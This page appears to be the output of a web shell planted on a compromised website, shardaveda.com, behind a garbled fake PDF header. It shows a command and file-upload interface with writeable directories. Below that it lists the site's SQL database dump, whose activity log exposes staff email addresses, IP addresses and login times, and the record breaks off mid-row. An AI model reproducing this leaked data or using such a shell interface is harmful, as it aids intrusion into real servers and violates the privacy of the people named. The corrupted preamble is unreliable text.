%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardaveda.com/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardaveda.com/veda.sql
/*
SQLyog Community Edition- MySQL GUI v6.56
MySQL - 5.7.12 : Database - shardaveda_db
*********************************************************************
*/


/*!40101 SET NAMES utf8 */;

/*!40101 SET SQL_MODE=''*/;

/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;

CREATE DATABASE /*!32312 IF NOT EXISTS*/`shardaveda_db` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `shardaveda_db`;

/*Table structure for table `active_pages` */

DROP TABLE IF EXISTS `active_pages`;

CREATE TABLE `active_pages` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `enabled` tinyint(1) NOT NULL,
  `page_type` enum('0','1','2','3','4') DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;

/*Data for the table `active_pages` */

insert  into `active_pages`(`id`,`name`,`enabled`,`page_type`) values (1,'about',1,'2'),(2,'home-page-section',1,'1'),(3,'faq',1,'1'),(4,'career',1,'1'),(5,'disclaimer',1,'1'),(6,'privacypolicy',1,'1'),(7,'terms-of-use',1,'1'),(8,'project-highlights',1,'1'),(9,'scenario-india',1,'2'),(10,'project-background',1,'1'),(11,'company-background',1,'2');

/*Table structure for table `history` */

DROP TABLE IF EXISTS `history`;

CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `activity` varchar(255) NOT NULL,
  `username` varchar(150) DEFAULT NULL,
  `time` int(10) unsigned NOT NULL,
  `createdon` datetime NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `display_order` int(11) NOT NULL DEFAULT '0',
  `ip_address` varchar(100) DEFAULT NULL,
  `status` enum('1','0') NOT NULL DEFAULT '1',
  `is_deleted` enum('1','0') NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=633 DEFAULT CHARSET=utf8;

/*Data for the table `history` */

insert  into `history`(`id`,`activity`,`username`,`time`,`createdon`,`display_order`,`ip_address`,`status`,`is_deleted`) values (1,'Go to Manage Shardastory','amit.verma@shardatech.org',1629730495,'2021-08-23 14:54:55',0,'47.31.223.224','1','0'),(2,'Go to Manage Business','amit.verma@shardatech.org',1629730498,'2021-08-23 14:54:58',0,'47.31.223.224','1','0'),(3,'Go to Manage Offices','amit.verma@shardatech.org',1629730500,'2021-08-23 14:55:00',0,'47.31.223.224','1','0'),(4,'Go to Manage Offices','amit.verma@shardatech.org',1629730542,'2021-08-23 14:55:42',0,'47.31.223.224','1','0'),(5,'Go to Pages manage','amit.verma@shardatech.org',1629730566,'2021-08-23 14:56:06',0,'47.31.223.224','1','0'),(6,'Add new page with name - About Us','amit.verma@shardatech.org',1629730577,'2021-08-23 14:56:17',0,'47.31.223.224','1','0'),(7,'Go to Pages manage','amit.verma@shardatech.org',1629730577,'2021-08-23 14:56:17',0,'47.31.223.224','1','0'),(8,'Go to Quotes','amit.verma@shardatech.org',1629730585,'2021-08-23 14:56:25',0,'47.31.223.224','1','0'),(9,'Go to Manage Business','amit.verma@shardatech.org',1629730599,'2021-08-23 14:56:39',0,'47.31.223.224','1','0'),(10,'Go to Manage Category','amit.verma@shardatech.org',1629730603,'2021-08-23 14:56:43',0,'47.31.223.224','1','0'),(11,'Go to Manage Business','amit.verma@shardatech.org',1629730609,'2021-08-23 14:56:49',0,'47.31.223.224','1','0'),(12,'Go to Add New Business','amit.verma@shardatech.org',1629730611,'2021-08-23 14:56:51',0,'47.31.223.224','1','0'),(13,'Go to Manage Menu','amit.verma@shardatech.org',1629730620,'2021-08-23 14:57:00',0,'47.31.223.224','1','0'),(14,'Go to home page','amit.verma@shardatech.org',1629730624,'2021-08-23 14:57:04',0,'47.31.223.224','1','0'),(15,'Go to home page','amit.verma@shardatech.org',1629730699,'2021-08-23 14:58:19',0,'47.31.223.224','1','0'),(16,'Go to home page','amit.verma@shardatech.org',1629730717,'2021-08-23 14:58:37',0,'47.31.223.224','1','0'),(17,'Go to Manage Menu','amit.verma@shardatech.org',1629730748,'2021-08-23 14:59:08',0,'47.31.223.224','1','0'),(18,'Create new menu - Home','amit.verma@shardatech.org',1629730774,'2021-08-23 14:59:34',0,'47.31.223.224','1','0'),(19,'Go to Manage Menu','amit.verma@shardatech.org',1629730774,'2021-08-23 14:59:34',0,'47.31.223.224','1','0'),(20,'Create new menu - About','amit.verma@shardatech.org',1629730795,'2021-08-23 14:59:55',0,'47.31.223.224','1','0'),(21,'Go to Manage Menu','amit.verma@shardatech.org',1629730795,'2021-08-23 14:59:55',0,'47.31.223.224','1','0'),(22,'Create new menu - Product','amit.verma@shardatech.org',1629730819,'2021-08-23 15:00:19',0,'47.31.223.224','1','0'),(23,'Go to Manage Menu','amit.verma@shardatech.org',1629730819,'2021-08-23 15:00:19',0,'47.31.223.224','1','0'),(24,'Create new menu - Knowledge Centre','amit.verma@shardatech.org',1629730851,'2021-08-23 15:00:51',0,'47.31.223.224','1','0'),(25,'Go to Manage Menu','amit.verma@shardatech.org',1629730852,'2021-08-23 15:00:52',0,'47.31.223.224','1','0'),(26,'Create new menu - Support','amit.verma@shardatech.org',1629730885,'2021-08-23 15:01:25',0,'47.31.223.224','1','0'),(27,'Go to Manage Menu','amit.verma@shardatech.org',1629730885,'2021-08-23 15:01:25',0,'47.31.223.224','1','0'),(28,'Go to Manage Menu','amit.verma@shardatech.org',1629731094,'2021-08-23 15:04:54',0,'47.31.223.224','1','0'),(29,'Create new menu - Out Story','amit.verma@shardatech.org',1629731127,'2021-08-23 15:05:27',0,'47.31.223.224','1','0'),(30,'Go to Manage Menu','amit.verma@shardatech.org',1629731127,'2021-08-23 15:05:27',0,'47.31.223.224','1','0'),(31,'Create new menu - Carrer','amit.verma@shardatech.org',1629731235,'2021-08-23 15:07:15',0,'47.31.223.224','1','0'),(32,'Go to Manage Menu','amit.verma@shardatech.org',1629731235,'2021-08-23 15:07:15',0,'47.31.223.224','1','0'),(33,'Create new menu - Team','amit.verma@shardatech.org',1629731262,'2021-08-23 15:07:42',0,'47.31.223.224','1','0'),(34,'Go to Manage Menu','amit.verma@shardatech.org',1629731263,'2021-08-23 15:07:43',0,'47.31.223.224','1','0'),(35,'Create new menu - FAQ\'s','amit.verma@shardatech.org',1629731292,'2021-08-23 15:08:12',0,'47.31.223.224','1','0'),(36,'Go to Manage Menu','amit.verma@shardatech.org',1629731292,'2021-08-23 15:08:12',0,'47.31.223.224','1','0'),(37,'Create new menu - Disclaimer','amit.verma@shardatech.org',1629731368,'2021-08-23 15:09:28',0,'47.31.223.224','1','0'),(38,'Go to Manage Menu','amit.verma@shardatech.org',1629731368,'2021-08-23 15:09:28',0,'47.31.223.224','1','0'),(39,'Create new menu - Privacy Policy','amit.verma@shardatech.org',1629731404,'2021-08-23 15:10:04',0,'47.31.223.224','1','0'),(40,'Go to Manage Menu','amit.verma@shardatech.org',1629731404,'2021-08-23 15:10:04',0,'47.31.223.224','1','0'),(41,'Create new menu - Terms & Conditions','amit.verma@shardatech.org',1629731440,'2021-08-23 15:10:40',0,'47.31.223.224','1','0'),(42,'Go to Manage Menu','amit.verma@shardatech.org',1629731440,'2021-08-23 15:10:40',0,'47.31.223.224','1','0'),(43,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629806308,'2021-08-24 11:58:28',0,'47.31.197.11','1','0'),(44,'Go to home page','amit.verma@shardatech.org',1629806308,'2021-08-24 11:58:28',0,'47.31.197.11','1','0'),(45,'Go to Manage Happenings','amit.verma@shardatech.org',1629806314,'2021-08-24 11:58:34',0,'47.31.197.11','1','0'),(46,'Go to Manage Happenings','amit.verma@shardatech.org',1629806320,'2021-08-24 11:58:40',0,'47.31.197.11','1','0'),(47,'Go to Manage Happenings','amit.verma@shardatech.org',1629806516,'2021-08-24 12:01:56',0,'47.31.197.11','1','0'),(48,'Go to Manage Happenings','amit.verma@shardatech.org',1629806615,'2021-08-24 12:03:35',0,'47.31.197.11','1','0'),(49,'Go to Manage Happenings','amit.verma@shardatech.org',1629806677,'2021-08-24 12:04:37',0,'47.31.197.11','1','0'),(50,'Go to Manage Happenings','amit.verma@shardatech.org',1629806720,'2021-08-24 12:05:20',0,'47.31.197.11','1','0'),(51,'Go to Manage Happenings','amit.verma@shardatech.org',1629806783,'2021-08-24 12:06:23',0,'47.31.197.11','1','0'),(52,'Go to Manage Happenings','amit.verma@shardatech.org',1629806807,'2021-08-24 12:06:47',0,'47.31.197.11','1','0'),(53,'Go to Manage Happenings','amit.verma@shardatech.org',1629806876,'2021-08-24 12:07:56',0,'47.31.197.11','1','0'),(54,'Go to Manage Happenings','amit.verma@shardatech.org',1629806936,'2021-08-24 12:08:56',0,'47.31.197.11','1','0'),(55,'Go to Manage Happenings','amit.verma@shardatech.org',1629806984,'2021-08-24 12:09:44',0,'47.31.197.11','1','0'),(56,'Go to Add New Sections','amit.verma@shardatech.org',1629806992,'2021-08-24 12:09:52',0,'47.31.197.11','1','0'),(57,'Go to Add New Sections','amit.verma@shardatech.org',1629807102,'2021-08-24 12:11:42',0,'47.31.197.11','1','0'),(58,'Go to Add New Sections','amit.verma@shardatech.org',1629810898,'2021-08-24 13:14:58',0,'47.31.197.11','1','0'),(59,'Sections Added Successfully','amit.verma@shardatech.org',1629811002,'2021-08-24 13:16:42',0,'47.31.197.11','1','0'),(60,'Go to Manage Happenings','amit.verma@shardatech.org',1629811002,'2021-08-24 13:16:42',0,'47.31.197.11','1','0'),(61,'Go to Manage Happenings','amit.verma@shardatech.org',1629811032,'2021-08-24 13:17:12',0,'47.31.197.11','1','0'),(62,'Go to Add New Happening','amit.verma@shardatech.org',1629811035,'2021-08-24 13:17:15',0,'47.31.197.11','1','0'),(63,'Go to Add New Happening','amit.verma@shardatech.org',1629811095,'2021-08-24 13:18:15',0,'47.31.197.11','1','0'),(64,'Go to Add New Happening','amit.verma@shardatech.org',1629811156,'2021-08-24 13:19:16',0,'47.31.197.11','1','0'),(65,'Go to Add New Happening','amit.verma@shardatech.org',1629811192,'2021-08-24 13:19:52',0,'47.31.197.11','1','0'),(66,'Article Added Successfully','amit.verma@shardatech.org',1629811376,'2021-08-24 13:22:56',0,'47.31.197.11','1','0'),(67,'Go to Manage Article','amit.verma@shardatech.org',1629811377,'2021-08-24 13:22:57',0,'47.31.197.11','1','0'),(68,'Go to Manage Article','amit.verma@shardatech.org',1629811415,'2021-08-24 13:23:35',0,'47.31.197.11','1','0'),(69,'Go to Add New Article','amit.verma@shardatech.org',1629811425,'2021-08-24 13:23:45',0,'47.31.197.11','1','0'),(70,'Article Added Successfully','amit.verma@shardatech.org',1629811539,'2021-08-24 13:25:39',0,'47.31.197.11','1','0'),(71,'Go to Manage Article','amit.verma@shardatech.org',1629811539,'2021-08-24 13:25:39',0,'47.31.197.11','1','0'),(72,'Go to Manage Happenings','amit.verma@shardatech.org',1629811606,'2021-08-24 13:26:46',0,'47.31.197.11','1','0'),(73,'Go to Manage Article','amit.verma@shardatech.org',1629811649,'2021-08-24 13:27:29',0,'47.31.197.11','1','0'),(74,'Go to Add New Article','amit.verma@shardatech.org',1629811652,'2021-08-24 13:27:32',0,'47.31.197.11','1','0'),(75,'Article Added Successfully','amit.verma@shardatech.org',1629811664,'2021-08-24 13:27:44',0,'47.31.197.11','1','0'),(76,'Go to Manage Article','amit.verma@shardatech.org',1629811664,'2021-08-24 13:27:44',0,'47.31.197.11','1','0'),(77,'Go to Add New Article','amit.verma@shardatech.org',1629811668,'2021-08-24 13:27:48',0,'47.31.197.11','1','0'),(78,'Article Added Successfully','amit.verma@shardatech.org',1629812437,'2021-08-24 13:40:37',0,'47.31.197.11','1','0'),(79,'Go to Manage Article','amit.verma@shardatech.org',1629812437,'2021-08-24 13:40:37',0,'47.31.197.11','1','0'),(80,'Go to Add New Article','amit.verma@shardatech.org',1629813135,'2021-08-24 13:52:15',0,'47.31.197.11','1','0'),(81,'Article Added Successfully','amit.verma@shardatech.org',1629813147,'2021-08-24 13:52:27',0,'47.31.197.11','1','0'),(82,'Go to Manage Article','amit.verma@shardatech.org',1629813147,'2021-08-24 13:52:27',0,'47.31.197.11','1','0'),(83,'Go to Add New Article','amit.verma@shardatech.org',1629813166,'2021-08-24 13:52:46',0,'47.31.197.11','1','0'),(84,'Go to Add New Article','amit.verma@shardatech.org',1629813177,'2021-08-24 13:52:57',0,'47.31.197.11','1','0'),(85,'Article Added Successfully','amit.verma@shardatech.org',1629813184,'2021-08-24 13:53:04',0,'47.31.197.11','1','0'),(86,'Go to Manage Article','amit.verma@shardatech.org',1629813185,'2021-08-24 13:53:05',0,'47.31.197.11','1','0'),(87,'Logout Successfully','amit.verma@shardatech.org',1629813642,'2021-08-24 14:00:42',0,'47.31.197.11','1','0'),(88,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629871246,'2021-08-25 06:00:46',0,'103.101.118.2','1','0'),(89,'Go to home page','amit.verma@shardatech.org',1629871246,'2021-08-25 06:00:46',0,'103.101.118.2','1','0'),(90,'Go to Settings Page','amit.verma@shardatech.org',1629871692,'2021-08-25 06:08:12',0,'103.101.118.2','1','0'),(91,'Change site logo','amit.verma@shardatech.org',1629871742,'2021-08-25 06:09:02',0,'103.101.118.2','1','0'),(92,'Go to Settings Page','amit.verma@shardatech.org',1629871742,'2021-08-25 06:09:02',0,'103.101.118.2','1','0'),(93,'Change site logo','amit.verma@shardatech.org',1629871748,'2021-08-25 06:09:08',0,'103.101.118.2','1','0'),(94,'Go to Settings Page','amit.verma@shardatech.org',1629871748,'2021-08-25 06:09:08',0,'103.101.118.2','1','0'),(95,'Go to Settings Page','amit.verma@shardatech.org',1629871757,'2021-08-25 06:09:17',0,'103.101.118.2','1','0'),(96,'Go to Settings Page','amit.verma@shardatech.org',1629871790,'2021-08-25 06:09:50',0,'103.101.118.2','1','0'),(97,'Change footer contacts','amit.verma@shardatech.org',1629871807,'2021-08-25 06:10:07',0,'103.101.118.2','1','0'),(98,'Go to Settings Page','amit.verma@shardatech.org',1629871807,'2021-08-25 06:10:07',0,'103.101.118.2','1','0'),(99,'Change footer copyright','amit.verma@shardatech.org',1629871811,'2021-08-25 06:10:11',0,'103.101.118.2','1','0'),(100,'Go to Settings Page','amit.verma@shardatech.org',1629871811,'2021-08-25 06:10:11',0,'103.101.118.2','1','0'),(101,'Go to Settings Page','amit.verma@shardatech.org',1629871814,'2021-08-25 06:10:14',0,'103.101.118.2','1','0'),(102,'Go to Settings Page','amit.verma@shardatech.org',1629871829,'2021-08-25 06:10:29',0,'103.101.118.2','1','0'),(103,'Go to Settings Page','amit.verma@shardatech.org',1629871832,'2021-08-25 06:10:32',0,'103.101.118.2','1','0'),(104,'Go to Settings Page','amit.verma@shardatech.org',1629871845,'2021-08-25 06:10:45',0,'103.101.118.2','1','0'),(105,'Change footer contacts','amit.verma@shardatech.org',1629871860,'2021-08-25 06:11:00',0,'14.139.238.62','1','0'),(106,'Go to Settings Page','amit.verma@shardatech.org',1629871860,'2021-08-25 06:11:00',0,'14.139.238.62','1','0'),(107,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629904857,'2021-08-25 15:20:57',0,'157.37.213.105','1','0'),(108,'Go to home page','amit.verma@shardatech.org',1629904857,'2021-08-25 15:20:57',0,'157.37.213.105','1','0'),(109,'Go to Manage Module','amit.verma@shardatech.org',1629904886,'2021-08-25 15:21:26',0,'157.37.213.105','1','0'),(110,'Go to Add/Edit module page','amit.verma@shardatech.org',1629904893,'2021-08-25 15:21:33',0,'157.37.213.105','1','0'),(111,'Module added Successfully','amit.verma@shardatech.org',1629904904,'2021-08-25 15:21:44',0,'157.37.213.105','1','0'),(112,'Go to Manage Module','amit.verma@shardatech.org',1629904904,'2021-08-25 15:21:44',0,'157.37.213.105','1','0'),(113,'Go to Add/Edit module page','amit.verma@shardatech.org',1629904929,'2021-08-25 15:22:09',0,'157.37.213.105','1','0'),(114,'Module added Successfully','amit.verma@shardatech.org',1629904939,'2021-08-25 15:22:19',0,'157.37.213.105','1','0'),(115,'Go to Manage Module','amit.verma@shardatech.org',1629904939,'2021-08-25 15:22:19',0,'157.37.213.105','1','0'),(116,'Go to Manage Module','amit.verma@shardatech.org',1629904943,'2021-08-25 15:22:23',0,'157.37.213.105','1','0'),(117,'Logout Successfully','amit.verma@shardatech.org',1629904948,'2021-08-25 15:22:28',0,'157.37.213.105','1','0'),(118,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629904953,'2021-08-25 15:22:33',0,'157.37.213.105','1','0'),(119,'Go to home page','amit.verma@shardatech.org',1629904953,'2021-08-25 15:22:33',0,'157.37.213.105','1','0'),(120,'Logout Successfully','amit.verma@shardatech.org',1629905282,'2021-08-25 15:28:02',0,'157.37.213.105','1','0'),(121,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629954043,'2021-08-26 05:00:43',0,'103.101.118.2','1','0'),(122,'Go to home page','amit.verma@shardatech.org',1629954043,'2021-08-26 05:00:43',0,'103.101.118.2','1','0'),(123,'Go to Manage Team','amit.verma@shardatech.org',1629954211,'2021-08-26 05:03:31',0,'103.101.118.2','1','0'),(124,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629954771,'2021-08-26 05:12:51',0,'103.101.118.2','1','0'),(125,'Go to Manage Team','amit.verma@shardatech.org',1629954786,'2021-08-26 05:13:06',0,'103.101.118.2','1','0'),(126,'Go to Manage Team','amit.verma@shardatech.org',1629955192,'2021-08-26 05:19:52',0,'103.101.118.2','1','0'),(127,'Go to Manage Team','amit.verma@shardatech.org',1629957768,'2021-08-26 06:02:48',0,'103.101.118.2','1','0'),(128,'Go to Manage Team','amit.verma@shardatech.org',1629958851,'2021-08-26 06:20:51',0,'103.101.118.2','1','0'),(129,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629958856,'2021-08-26 06:20:56',0,'103.101.118.2','1','0'),(130,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629958904,'2021-08-26 06:21:44',0,'103.101.118.2','1','0'),(131,'Team Member Added Successfully','amit.verma@shardatech.org',1629958933,'2021-08-26 06:22:13',0,'103.101.118.2','1','0'),(132,'Go to Manage Team','amit.verma@shardatech.org',1629958933,'2021-08-26 06:22:13',0,'103.101.118.2','1','0'),(133,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629958940,'2021-08-26 06:22:20',0,'103.101.118.2','1','0'),(134,'Go to Manage Team','amit.verma@shardatech.org',1629958944,'2021-08-26 06:22:24',0,'103.101.118.2','1','0'),(135,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1629968212,'2021-08-26 08:56:52',0,'14.139.238.62','1','0'),(136,'Go to home page','amit.verma@shardatech.org',1629968212,'2021-08-26 08:56:52',0,'14.139.238.62','1','0'),(137,'Go to Manage Team','amit.verma@shardatech.org',1629968217,'2021-08-26 08:56:57',0,'14.139.238.62','1','0'),(138,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968218,'2021-08-26 08:56:58',0,'14.139.238.62','1','0'),(139,'Team Member Added Successfully','amit.verma@shardatech.org',1629968225,'2021-08-26 08:57:05',0,'14.139.238.62','1','0'),(140,'Go to Manage Team','amit.verma@shardatech.org',1629968225,'2021-08-26 08:57:05',0,'14.139.238.62','1','0'),(141,'Go to Manage Team','amit.verma@shardatech.org',1629968307,'2021-08-26 08:58:27',0,'103.101.118.2','1','0'),(142,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968309,'2021-08-26 08:58:29',0,'103.101.118.2','1','0'),(143,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968348,'2021-08-26 08:59:08',0,'103.101.118.2','1','0'),(144,'Team Member Added Successfully','amit.verma@shardatech.org',1629968361,'2021-08-26 08:59:21',0,'103.101.118.2','1','0'),(145,'Go to Manage Team','amit.verma@shardatech.org',1629968361,'2021-08-26 08:59:21',0,'103.101.118.2','1','0'),(146,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968364,'2021-08-26 08:59:24',0,'103.101.118.2','1','0'),(147,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968391,'2021-08-26 08:59:51',0,'103.101.118.2','1','0'),(148,'Team Member Added Successfully','amit.verma@shardatech.org',1629968399,'2021-08-26 08:59:59',0,'103.101.118.2','1','0'),(149,'Go to Manage Team','amit.verma@shardatech.org',1629968399,'2021-08-26 08:59:59',0,'103.101.118.2','1','0'),(150,'Go to Add/Edit Team Member','amit.verma@shardatech.org',1629968499,'2021-08-26 09:01:39',0,'103.101.118.2','1','0'),(151,'Go to Manage Team','amit.verma@shardatech.org',1629975142,'2021-08-26 10:52:22',0,'103.101.118.2','1','0'),(152,'Logout Successfully','amit.verma@shardatech.org',1629975151,'2021-08-26 10:52:31',0,'103.101.118.2','1','0'),(153,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1630053883,'2021-08-27 08:44:43',0,'103.101.118.2','1','0'),(154,'Go to home page','amit.verma@shardatech.org',1630053883,'2021-08-27 08:44:43',0,'103.101.118.2','1','0'),(155,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1630564006,'2021-09-02 06:26:46',0,'103.101.118.2','1','0'),(156,'Go to home page','amit.verma@shardatech.org',1630564006,'2021-09-02 06:26:46',0,'103.101.118.2','1','0'),(157,'Go to Manage Menu','amit.verma@shardatech.org',1630564955,'2021-09-02 06:42:35',0,'103.101.118.2','1','0'),(158,'Go to Manage Menu','amit.verma@shardatech.org',1630564962,'2021-09-02 06:42:42',0,'103.101.118.2','1','0'),(159,'Go to Manage Menu','amit.verma@shardatech.org',1630564968,'2021-09-02 06:42:48',0,'103.101.118.2','1','0'),(160,'Invalid details. Please try again with valid details',NULL,1630923518,'2021-09-06 10:18:38',0,'14.139.238.62','1','0'),(161,'Invalid details. Please try again with valid details',NULL,1630924151,'2021-09-06 10:29:11',0,'14.139.238.62','1','0'),(162,'Go to dashboard. Sucessfully login','Imran@shardatech.org',1630924158,'2021-09-06 10:29:18',0,'103.101.118.2','1','0'),(163,'Go to home page','Imran@shardatech.org',1630924158,'2021-09-06 10:29:18',0,'103.101.118.2','1','0'),(164,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1630924167,'2021-09-06 10:29:27',0,'103.101.118.2','1','0'),(165,'Go to home page','amit.verma@shardatech.org',1630924167,'2021-09-06 10:29:27',0,'103.101.118.2','1','0'),(166,'Go to Manage Team','Imran@shardatech.org',1630924180,'2021-09-06 10:29:40',0,'103.101.118.2','1','0'),(167,'Go to Manage Milestones','Imran@shardatech.org',1630924196,'2021-09-06 10:29:56',0,'103.101.118.2','1','0'),(168,'Go to home page','Imran@shardatech.org',1630924260,'2021-09-06 10:31:00',0,'103.101.118.2','1','0'),(169,'Go to Manage Module','amit.verma@shardatech.org',1630925041,'2021-09-06 10:44:01',0,'103.101.118.2','1','0'),(170,'Go to Add/Edit module page','amit.verma@shardatech.org',1630925062,'2021-09-06 10:44:22',0,'14.139.238.62','1','0'),(171,'Module added Successfully','amit.verma@shardatech.org',1630925105,'2021-09-06 10:45:05',0,'103.101.118.2','1','0'),(172,'Go to Manage Module','amit.verma@shardatech.org',1630925106,'2021-09-06 10:45:06',0,'103.101.118.2','1','0'),(173,'Go to dashboard. Sucessfully login','Imran@shardatech.org',1630994760,'2021-09-07 06:06:00',0,'103.214.61.23','1','0'),(174,'Go to home page','Imran@shardatech.org',1630994760,'2021-09-07 06:06:00',0,'103.214.61.23','1','0'),(175,'Go to Manage Team','Imran@shardatech.org',1630995186,'2021-09-07 06:13:06',0,'103.214.61.23','1','0'),(176,'Go to Add/Edit Team Member','Imran@shardatech.org',1630995256,'2021-09-07 06:14:16',0,'103.214.61.23','1','0'),(177,'Team Member Added Successfully','Imran@shardatech.org',1630995309,'2021-09-07 06:15:09',0,'103.214.61.23','1','0'),(178,'Go to Manage Team','Imran@shardatech.org',1630995309,'2021-09-07 06:15:09',0,'103.214.61.23','1','0'),(179,'Go to Add/Edit Team Member','Imran@shardatech.org',1630995341,'2021-09-07 06:15:41',0,'103.214.61.23','1','0'),(180,'Team Member Added Successfully','Imran@shardatech.org',1630995388,'2021-09-07 06:16:28',0,'103.214.61.23','1','0'),(181,'Go to Manage Team','Imran@shardatech.org',1630995388,'2021-09-07 06:16:28',0,'103.214.61.23','1','0'),(182,'Go to Add/Edit Team Member','Imran@shardatech.org',1630995390,'2021-09-07 06:16:30',0,'103.214.61.23','1','0'),(183,'Team Member Added Successfully','Imran@shardatech.org',1630995431,'2021-09-07 06:17:11',0,'103.214.61.23','1','0'),(184,'Go to Manage Team','Imran@shardatech.org',1630995431,'2021-09-07 06:17:11',0,'103.214.61.23','1','0'),(185,'Go to Add/Edit Team Member','Imran@shardatech.org',1630995435,'2021-09-07 06:17:15',0,'103.214.61.23','1','0'),(186,'Team Member Added Successfully','Imran@shardatech.org',1630995511,'2021-09-07 06:18:31',0,'103.214.61.23','1','0'),(187,'Go to Manage Team','Imran@shardatech.org',1630995511,'2021-09-07 06:18:31',0,'103.214.61.23','1','0'),(188,'Go to Add/Edit Team Member','Imran@shardatech.org',1630995514,'2021-09-07 06:18:34',0,'103.214.61.23','1','0'),(189,'Team Member Added Successfully','Imran@shardatech.org',1630995561,'2021-09-07 06:19:21',0,'103.214.61.23','1','0'),(190,'Go to Manage Team','Imran@shardatech.org',1630995562,'2021-09-07 06:19:22',0,'103.214.61.23','1','0'),(191,'Go to dashboard. Sucessfully login','Imran@shardatech.org',1631166567,'2021-09-09 05:49:27',0,'103.101.118.2','1','0'),(192,'Go to home page','Imran@shardatech.org',1631166567,'2021-09-09 05:49:27',0,'103.101.118.2','1','0'),(193,'Go to dashboard. Sucessfully login','Imran@shardatech.org',1631610933,'2021-09-14 09:15:33',0,'103.101.118.2','1','0'),(194,'Go to home page','Imran@shardatech.org',1631610933,'2021-09-14 09:15:33',0,'103.101.118.2','1','0'),(195,'Go to Manage Team','Imran@shardatech.org',1631610938,'2021-09-14 09:15:38',0,'103.101.118.2','1','0'),(196,'Go to Add/Edit Team Member','Imran@shardatech.org',1631610942,'2021-09-14 09:15:42',0,'103.101.118.2','1','0'),(197,'Team Member Added Successfully','Imran@shardatech.org',1631610969,'2021-09-14 09:16:09',0,'103.101.118.2','1','0'),(198,'Go to Manage Team','Imran@shardatech.org',1631610969,'2021-09-14 09:16:09',0,'103.101.118.2','1','0'),(199,'Go to Add/Edit Team Member','Imran@shardatech.org',1631610987,'2021-09-14 09:16:27',0,'103.101.118.2','1','0'),(200,'Team Member Added Successfully','Imran@shardatech.org',1631610999,'2021-09-14 09:16:39',0,'103.101.118.2','1','0'),(201,'Go to Manage Team','Imran@shardatech.org',1631610999,'2021-09-14 09:16:39',0,'103.101.118.2','1','0'),(202,'Go to Add/Edit Team Member','Imran@shardatech.org',1631611002,'2021-09-14 09:16:42',0,'103.101.118.2','1','0'),(203,'Team Member Added Successfully','Imran@shardatech.org',1631611009,'2021-09-14 09:16:49',0,'103.101.118.2','1','0'),(204,'Go to Manage Team','Imran@shardatech.org',1631611009,'2021-09-14 09:16:49',0,'103.101.118.2','1','0'),(205,'Go to Add/Edit Team Member','Imran@shardatech.org',1631611014,'2021-09-14 09:16:54',0,'103.101.118.2','1','0'),(206,'Team Member Added Successfully','Imran@shardatech.org',1631611021,'2021-09-14 09:17:01',0,'103.101.118.2','1','0'),(207,'Go to Manage Team','Imran@shardatech.org',1631611021,'2021-09-14 09:17:01',0,'103.101.118.2','1','0'),(208,'Go to dashboard. Sucessfully login','Imran@shardatech.org',1631773207,'2021-09-16 06:20:07',0,'14.139.238.62','1','0'),(209,'Go to home page','Imran@shardatech.org',1631773207,'2021-09-16 06:20:07',0,'14.139.238.62','1','0'),(210,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1631773409,'2021-09-16 06:23:29',0,'103.101.118.2','1','0'),(211,'Go to home page','amit.verma@shardatech.org',1631773409,'2021-09-16 06:23:29',0,'103.101.118.2','1','0'),(212,'Go to Manage Menu','amit.verma@shardatech.org',1631774990,'2021-09-16 06:49:50',0,'14.139.238.62','1','0'),(213,'Go to Manage Milestones','amit.verma@shardatech.org',1631775071,'2021-09-16 06:51:11',0,'103.101.118.2','1','0'),(214,'Logout Successfully','amit.verma@shardatech.org',1631775184,'2021-09-16 06:53:04',0,'103.101.118.2','1','0'),(215,'Go to dashboard. Sucessfully login','amit.verma@shardatech.org',1631775189,'2021-09-16 06:53:09',0,'103.101.118.2','1','0'),(216,'Go to home page','amit.verma@shardatech.org',1631775190,'2021-09-16 